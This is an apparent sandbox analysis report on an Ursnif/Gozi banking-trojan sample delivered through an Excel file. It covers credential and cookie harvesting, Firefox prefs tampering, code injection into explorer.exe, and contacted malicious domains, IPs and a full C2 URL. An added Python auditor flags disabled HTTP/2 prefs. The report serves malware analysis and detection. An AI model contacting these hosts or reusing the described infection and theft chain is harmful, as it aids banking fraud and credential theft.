Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003898C8 GetLocalTime, 4_2_003898C8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0047A446 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 4_2_0047A446
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00431146 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 4_2_00431146
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Overwrites Mozilla Firefox settings
Source: C:\Windows\explorer.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\prefs.js
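
The prefs.js write comes from explorer.exe, which at this point carries the injected code, and the summary signature "Disables SPDY" says what is being changed: with HTTP/2 off, the browser falls back to HTTP/1.1 streams that the injected code can rewrite for web injects. The auditor below is an added example, not from the report; it parses a prefs.js and reports HTTP/2 (SPDY) switches turned off and any security.* pref set to false. The pref names on the watch list and the sample prefs.js are assumptions, not values recovered from the sample.

```python
"""Audit a Firefox prefs.js for settings a man-in-the-browser trojan flips.

Added example, not from the report. The report records explorer.exe (with
injected code) rewriting prefs.js and the summary lists 'Disables SPDY'; the
pref names and the sample file below are assumptions, not values recovered
from the sample.
"""
import re
from typing import Dict, List, Tuple, Union

Value = Union[bool, int, str]

# user_pref("name", value);  -- value is true/false, an integer or a quoted string
_PREF = re.compile(r'^\s*user_pref\("([^"]+)",\s*(.+?)\);\s*$')

# Assumed watch list: prefs that turn off HTTP/2 (SPDY). Forcing HTTP/1.1
# keeps responses in a form the injected code can rewrite. Check the exact
# names against the Firefox version on the host.
PROTOCOL_PREFS = {
    "network.http.spdy.enabled",
    "network.http.spdy.enabled.http2",
    "network.http.http2.enabled",
}


def parse_prefs(text: str) -> Dict[str, Value]:
    """Parse user_pref lines into a dict with typed values."""
    prefs: Dict[str, Value] = {}
    for line in text.splitlines():
        m = _PREF.match(line)
        if not m:
            continue                       # comments, blank lines
        name, raw = m.group(1), m.group(2).strip()
        if raw in ("true", "false"):
            prefs[name] = raw == "true"
        elif re.fullmatch(r"-?\d+", raw):
            prefs[name] = int(raw)
        elif len(raw) >= 2 and raw[0] == raw[-1] == '"':
            prefs[name] = raw[1:-1]
        else:
            prefs[name] = raw
    return prefs


def audit_prefs(text: str) -> List[Tuple[str, Value, str]]:
    """Return (pref, value, reason) for every setting worth a second look."""
    findings: List[Tuple[str, Value, str]] = []
    for name, val in parse_prefs(text).items():
        if name in PROTOCOL_PREFS and val is False:
            findings.append((name, val,
                             "HTTP/2 (SPDY) disabled, matches the report's 'Disables SPDY' signature"))
        elif name.startswith("security.") and val is False:
            findings.append((name, val,
                             "security.* pref switched off; compare with a clean profile"))
    return findings


# Constructed prefs.js: two ordinary entries plus three a trojan would write.
SAMPLE_PREFS = """\
// Mozilla User Preferences
user_pref("app.update.lastUpdateTime.background-update-timer", 1612850000);
user_pref("browser.startup.homepage", "about:home");
user_pref("network.http.spdy.enabled", false);
user_pref("network.http.spdy.enabled.http2", false);
user_pref("security.csp.enable", false);
"""

if __name__ == "__main__":
    for name, val, why in audit_prefs(SAMPLE_PREFS):
        print(f"{name} = {val}: {why}")
```

Run it against the prefs.js of every profile under AppData\Roaming\Mozilla\Firefox\Profiles on a suspect host; a clean Firefox profile does not write these protocol prefs at all, so their mere presence with value false is the indicator, and the file's modification time should line up with the injection window in the process timeline.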

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.2321839049.00000000039CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2321796165.00000000039CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2321745663.00000000039CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2455042419.0000000002936000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2380930371.00000000028D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2416709074.0000000002340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2321730520.00000000039CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2321759010.00000000039CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2378828561.00000000022D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2416998966.0000000002890000.00000040.00000001.sdmp, type: MEMORY
Searches for Windows Mail specific files
Source: C:\Windows\explorer.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
Source: C:\Windows\explorer.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail account<.oeaccount
Source: C:\Windows\explorer.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail unknown
Source: C:\Windows\explorer.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail unknown
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\59C02561138E71C7237CBC3288BF172D8DF80F79
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\CD054398D4C8F7E0F984E5C9895F3CE31CC87DD9
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\339A4E96E26DFFA4704F0AF081D2B85B12D03939
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\B32C5865A88F2CD8FDBF2030BCB0763B059A1088
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\1CA6B5DA175F6418512B23A5A017803597A480EB
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\34DC0D4BCA039E40FAC014DB99C037C817105B9F
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\065910A062E51C85C91C2EE807B329EFE5711F5C
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\AD7A5673189C3D8259E7B3FE0033E19E1674CC68
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\649FFC13DDEC1DBA9F414E044964903168569E56
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\0B42EA5C9D9EFD01C140C78669B38B9FE2EC7FF9
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\B22D1793116439B747286991833479A623FC4674
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\D6D7AC0B3D4DAC40D7A42CBE0FCCD3EF6B2BB312
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\77BEB77D9CC969C39958CC4A5EBACAF025E09EA4
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\08A8D56DDA6D87D47C4B2F4F1B528495275BC613
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\D6917E8702435738DCE3CD40A6F91B6122C65D11
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\B7DB036074231ACC212F58CA5B8AF0545A418060
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\F1B5C3EDE100D4A38A0A28F1CEF6FAEFB619EC1B
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\CBE7F0D75353AA4E35CB585DED5088B5BB2CA08A
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\AE22A0F0A82489CB8E655FC2818819FA91DD2B8A
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_3
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_2
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\1074F7817233D871CC944D502A9577E43F08D441
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\F6C123BA9B7A4F6A8BB0350975A5AA2D99CD4B8D
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\C27D7A62FCB3822B15FE7A889EAC6EBCB8E81A80
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\C4CE867FE0AA83CF617E1E53F7AD2BEF93EE104F
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\B6DA8786A7D636181A70911A15213BBCA7152383
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\BCB517001182874C3EE3D0BC6D29EAF91EE374DB
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\24F9514653FD834D9D33E21B4C0AECB308550A9A
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\B45AEF301B9732B10C16E5E8B0DBEA59D1B69AD1
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\70C2F191395AE2444F6C418256D93D799A956A90
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_1
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\2C1C3006E308780316B46ECD995A5336C781BEE6
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_0
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\prefs.js
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\7DBD6E5E66612FF568AC1DAE7D6AC74339D3042A
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\FF0B833C30069A3BC4E969366182DFE389B5A270
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\D6525701412DDA4A90A6A63D90D00E4C9159AEAC
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000003
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000002
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000001
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000007
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000006
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000005
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000004
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000009
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000008
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\5F48FAABC36B7B66AAC3820F4C14377E7CE7AF5C
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\58CCEC10476E9CB5DA9CE3FF0AF5992D809E237E
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\AAB980CEA9A2C2CD649588DC3DE613F3AB65EFF8
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\8E791F7BE2E3E2019DC6B755A143896278E03C07
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\F8AC72083E334F70A553AE68455FBDF0E65C5221
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\58A0FB92CAE6B02B4582D904EEC431CBB6B5E40A
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\5B9196645BD157422AF27C7DAA67799558B3FDF3
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\5E4954707B44E5A4B4ACF5F22B52219A1DCA477F
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\4ED140178E492EA87CC63B79854E2794790379DF
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\3E538CAC2C914514ECC5B580E31B0737FF540EB1
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\F05AA1EFF89E0FD1AC143555DFC77620967E6322
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\AA369978819D108BB5DE6FECD6B74914FE7ABAEC
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\5D44AC703C53CC7EE6356F698FD1B03DA81FFE47
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\1AD79CD9E352B4D21302A1BC230FE9EB0CEAB7CC
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\A7917C54721C7E3C9AAFE4198A84F6F2EC3CA3E0
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\698AC159A6BCBA0D13FE6F10F1A38E498F826F33
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\EFAF9EB99E327835B6967A4E9F5034990DF6B1B8
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_00000a
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\3835EDD8701D457A3875F88E6675215A0AA3E0AF
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\78A520FE200DD59F7079043C2E4494D582DB5E27
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\BA5B00FE10C66B51AE0A363E2D5F1B4E065442C6
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\8E68C7016C8759B0ACAD6457BC74279D20949B81
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\D99D23F5F3F259C7157F3A35B594FF8A1B4F423F
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\929BCF811537CE5A1B05BC367E7D5FCD9D1512C2
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\333121A7E00FDA6F4294B140CFDA07F2D535F196
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\index
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\0FE7E01D07E074CEFEED27C015D1547B9354372D
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\6C6FC58E102CACB06D13B3875A2BD07C1426EBD6
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\DB11BB04DBABBEED1877D68FDFB7B20A20F3D7A1
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\D6F079F21194AF40050B050CF0C5B7B7593CB819
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\DDB36231816DC2568B9A92F175CA0175D5255B6D
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\AD723E2A38015428896DFDC95ED19ACE3C651918
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\D74761D73B3FE6877898A5D6E1AB6B5BA566BD84
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\013291A16EA8E3175CFC06D53A8C2B8141DD6F17
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\96B7A43304E9646262F1142854470CA1F53426AC
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\AD75170AFD4083DF36F2FB2A0FF4F5F235DAACCC
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\3B67994E37D438004B4E63B8887ABA39CCE10F06
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\CD57E3AA8FBEB529CF301EA04C8677DF47B1E70A
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\90873B6220C4B6986D18F883E40CDFF4130FA25D
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\81891801FEAAB03CA623D8EA33A96214385BBE6D
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqlite
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\7A8D3A9360CC37F0AD80962D4AEA72B6D0F0B2B3
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\BAD48B4A98F040CB709A10AB911B7F5951B80382
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\0EDDF8C091E2FED62E44BEDDDC1723F5BF38FE4F
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\275D9A5B16B4554265D09A906CD570CE978CD459
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\CFD0F2ECB0EF30EDABF9D5E0C6E0F881541171CE
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\EB884CABEA8CEEDAE45ACF90C1602D525A0BC4A1
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\C3357B699A03D6C47624A0BC4184ED6E2B8D6443
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\B73E4A4438B9B71F020E7D4B54AE283770E47CA7
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\E6D66AFFD836C8C13B306AAB42C9C6E3425363B6
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\F155A5045E38F0B6AAA9B23A7B2D1F5C01458986
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\E066368A4F08EB33BD47C7065C0D4D8CEF1EBCEB
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\B610CB95B704256B17422E60EED197A84FFE77AA
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\283625767F66A9BAD90DE654C536F9BA74C66CC0
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\645AC9609952C4386AE4A188AB706FBE5D5A9EEC
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\DB35F7B5C3B638134575506C1DECC7214B0152E3
Tries to steal Mail credentials (via file access)
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.2321839049.00000000039CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2321796165.00000000039CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2321745663.00000000039CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2455042419.0000000002936000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2380930371.00000000028D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2416709074.0000000002340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2321730520.00000000039CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2321759010.00000000039CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2378828561.00000000022D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2416998966.0000000002890000.00000040.00000001.sdmp, type: MEMORY
Behavior Graph

Graph ID 350432, sample xls.xls, start date 09/02/2021, architecture WINDOWS, score 100. The graph image is not reproduced here; the process tree below is rebuilt from its node data. Node numbers are the graph's own. The bracketed counts after a process are the created registry values / created files the graph annotates it with; where the graph shows only one count it is reproduced as shown.

Root-level DNS: 8.8.8.8.in-addr.arpa, 1.0.0.127.in-addr.arpa
Root-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Antivirus detection for URL or domain; 18 other signatures

  EXCEL.EXE (13) [86 / 43]
    network: online-docu-sign-st.com 8.208.96.68:80 (local port 49165), CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC, Singapore
    dropped: C:\fyjh\zglgy\lckhvmn.drhdh (PE32); C:\Users\user\AppData\Local\...\yytr[1].png (PE32)
    signatures: Document exploit detected (process start blacklist hit); Document exploit detected (UrlDownloadToFile)
    rundll32.exe (25)
      rundll32.exe (45) [1]
        signatures: Detected Gozi e-Banking trojan; Writes to foreign memory regions; Writes registry values via WMI; Contains functionality to detect sleep reduction / modifications
        control.exe (60)
          rundll32.exe (67)
  mshta.exe (10)
    signatures: Suspicious powershell command line found
    powershell.exe (21)
      dropped: C:\Users\user\AppData\Local\...\vl8o3v8u.0.cs (UTF-8); C:\Users\user\AppData\...\8pjpp9kb.cmdline (UTF-8)
      signatures: Hijacks the control flow in another process; Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; 4 other signatures
      csc.exe (41)
        dropped: C:\Users\user\AppData\Local\...\8pjpp9kb.dll (PE32)
        signatures: Tries to delay execution (extensive OutputDebugStringW loop)
        cvtres.exe (56)
      csc.exe (43)
        dropped: C:\Users\user\AppData\Local\...\vl8o3v8u.dll (PE32)
        cvtres.exe (58)
      explorer.exe (36) [injected]
        network: eorctconthoelrrpentshfex.com 45.67.231.135:443, SERVERIUS-ASNL, Moldova Republic of; mozilla.cloudflare-dns.com 104.16.249.249:443 (local ports 49194, 49195), CLOUDFLARENETUS, United States
        dropped: C:\Users\user\AppData\Roaming\...\prefs.js (ASCII)
        signatures: Tries to steal Mail credentials (via file access); Overwrites Mozilla Firefox settings; Searches for Windows Mail specific files; 4 other signatures
        cmd.exe (47)
          signatures: Uses nslookup.exe to query domains
          nslookup.exe (62)
            DNS: 222.222.67.208.in-addr.arpa, resolver1.opendns.com, myip.opendns.com
        cmd.exe (50)
          ipconfig.exe (65)
        cmd.exe (52)
        cmd.exe (54)
  iexplore.exe (17) [6 / 36]
    iexplore.exe (27) [23]
      network: assets.onestore.ms, consentdeliveryfd.azurefd.net, ajax.aspnetcdn.com
  3 other processes (19)
    iexplore.exe (30) [14]
    iexplore.exe (32) [18]
      network: pronpepsipirpyamvioerd.com 80.208.230.180 (local ports 49186, 49187, 49188), RACKRAYUABRakrejusLT, Lithuania
    iexplore.exe (34) [14]

Contacted Public IPs

IP              Domain   Country              ASN    ASN Name                                           Malicious
104.16.249.249  unknown  United States        13335  CLOUDFLARENETUS                                    false
8.208.96.68     unknown  Singapore            45102  CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC   true
80.208.230.180  unknown  Lithuania            62282  RACKRAYUABRakrejusLT                               false
45.67.231.135   unknown  Moldova Republic of  50673  SERVERIUS-ASNL                                     true

Contacted Domains

Name IP Active
pronpepsipirpyamvioerd.com 80.208.230.180 true
mozilla.cloudflare-dns.com 104.16.249.249 true
myip.opendns.com 84.17.52.38 true
eorctconthoelrrpentshfex.com 45.67.231.135 true
resolver1.opendns.com 208.67.222.222 true
online-docu-sign-st.com 8.208.96.68 true
1.0.0.127.in-addr.arpa unknown unknown
assets.onestore.ms unknown unknown
222.222.67.208.in-addr.arpa unknown unknown
8.8.8.8.in-addr.arpa unknown unknown
ajax.aspnetcdn.com unknown unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://pronpepsipirpyamvioerd.com/manifest/epAdaEbgmyrS0/5cBg2_2F/5r8v5YqebG9_2BzXwQ53Or2/m_2BYyZlMo/Wjgc3SrdyI1oKZciJ/0VZWBVvz9ttQ/e_2BqGDPIqO/VywJMmm_2FxNKs/BOcG3xAwzit4RyHpLyJsr/vwEVLjnqkBMf1zrK/m34BDAlEVdkNvcp/4fnxbyz8Lb2BtkfzoG/Qmy6EiDgS/W_2BAz08nRnapN/NuB.snx | true | Avira URL Cloud: safe | unknown
